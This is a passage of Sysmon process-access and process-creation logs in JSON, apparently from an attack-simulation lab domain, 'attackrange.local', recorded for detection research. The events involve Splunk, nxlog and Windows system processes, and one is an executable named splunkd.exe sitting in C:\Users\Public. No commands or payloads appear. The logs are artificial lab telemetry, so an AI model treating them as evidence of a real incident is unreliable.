06:52:59.863","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4358,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-114B-5F25-0000-0010BD190600}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-114B-5F25-0000-0010BD190600}","TargetProcessId":"1476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4359,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.988\r\nSourceProcessGUID: {E2A3D6B1-114B-5F25-0000-0010BD190600}\r\nSourceProcessId: 1476\r\nSourceThreadId: 1608\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.988","SourceProcessGUID":"{E2A3D6B1-114B-5F25-0000-0010BD190600}","SourceProcessId":"1476","SourceThreadId":"1608","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4360,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.488\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.488","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4361,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.536\r\nProcessGuid: {E2A3D6B1-114C-5F25-0000-0010601B0600}\r\nProcessId: 3056\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.536","ProcessGuid":"{E2A3D6B1-114C-5F25-0000-0010601B0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4362,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-114C-5F25-0000-0010601B0600}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-114C-5F25-0000-0010601B0600}","TargetProcessId":"3056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4363,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-114C-5F25-0000-0010601B0600}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-114C-5F25-0000-0010601B0600}","TargetProcessId":"3056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4364,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4365,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4366,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 